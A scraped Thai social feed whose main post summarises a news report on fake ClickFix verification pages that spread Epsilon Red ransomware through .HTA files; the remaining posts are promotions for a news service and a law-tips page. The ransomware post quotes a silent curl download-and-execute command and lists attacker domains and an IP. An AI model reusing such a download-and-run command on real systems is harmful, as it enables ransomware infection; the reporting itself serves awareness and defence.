    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 506 Views 0 Reviews
  • แสวงหาเรื่องราวทั้งไทยและอาเซียน ที่ชัดเจน ตรงไปตรงมา บนพื้นฐานของความจริง

    พบกับ Newskit ทุกเช้าวันจันทร์-พฤหัสบดี เริ่ม 4 สิงหาคม 2568 (ยกเว้นวันหยุดนักขัตฤกษ์ หรือมีธุระส่วนตัว)

    อ่านโพสต์ใหม่ได้ที่

    Thaitimes : https://thaitimes.co/pages/newskit
    Facebook : https://facebook.com/newskit.th
    Instagram : https://instagram.com/newskit.th

    #Newskit LIFE NEVER STOPS.
    แสวงหาเรื่องราวทั้งไทยและอาเซียน ที่ชัดเจน ตรงไปตรงมา บนพื้นฐานของความจริง พบกับ Newskit ทุกเช้าวันจันทร์-พฤหัสบดี เริ่ม 4 สิงหาคม 2568 (ยกเว้นวันหยุดนักขัตฤกษ์ หรือมีธุระส่วนตัว) อ่านโพสต์ใหม่ได้ที่ Thaitimes : https://thaitimes.co/pages/newskit Facebook : https://facebook.com/newskit.th Instagram : https://instagram.com/newskit.th #Newskit LIFE NEVER STOPS.
    Like
    1
    0 Comments 0 Shares 474 Views 0 Reviews
  • EP.56 : โฉนดที่ดิน
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.56 : โฉนดที่ดิน #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 542 Views 0 Reviews
  • EP.55 : การค้ำประกัน: สิ่งที่คุณต้องรู้ก่อนตัดสินใจเซ็นสัญญา

    การค้ำประกัน คือสัญญาที่บุคคลหนึ่งเรียกว่า ผู้ค้ำประกัน ตกลงที่จะผูกพันตนต่อ เจ้าหนี้ เพื่อชำระหนี้แทน ลูกหนี้ ในกรณีที่ลูกหนี้ไม่สามารถชำระหนี้นั้นได้ตามที่ตกลงกันไว้
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.55 : การค้ำประกัน: สิ่งที่คุณต้องรู้ก่อนตัดสินใจเซ็นสัญญา การค้ำประกัน คือสัญญาที่บุคคลหนึ่งเรียกว่า ผู้ค้ำประกัน ตกลงที่จะผูกพันตนต่อ เจ้าหนี้ เพื่อชำระหนี้แทน ลูกหนี้ ในกรณีที่ลูกหนี้ไม่สามารถชำระหนี้นั้นได้ตามที่ตกลงกันไว้ #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 551 Views 0 Reviews
  • EP.54 : ประเภทของที่ดินที่คุณควรรู้ก่อนซื้อขาย
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.54 : ประเภทของที่ดินที่คุณควรรู้ก่อนซื้อขาย #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 505 Views 0 Reviews
  • EP.53 : เงื่อนไขและอัตราเงินทดแทนใหม่
    สำหรับผู้ประกันตนมาตรา 33 ที่ถูกเลิกจ้าง
    ตั้งแต่วันที่ 28 มิถุนายน 2568 เป็นต้นไป
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.53 : เงื่อนไขและอัตราเงินทดแทนใหม่ สำหรับผู้ประกันตนมาตรา 33 ที่ถูกเลิกจ้าง ตั้งแต่วันที่ 28 มิถุนายน 2568 เป็นต้นไป #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 489 Views 0 Reviews
  • EP.52 : แนวทางที่เจ้าหนี้ควรปฎิบัติ
    เมื่อลูกหนี้ไม่ชำระหนี้
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Line Offcial : https://lin.ee/HfQHAph
    EP.52 : แนวทางที่เจ้าหนี้ควรปฎิบัติ เมื่อลูกหนี้ไม่ชำระหนี้ #กฎหมาย #ทนายความ --------------------------------------------- ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่ Facebook : https://www.facebook.com/profile.php?id=61567000193856 Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 521 Views 0 Reviews
More Results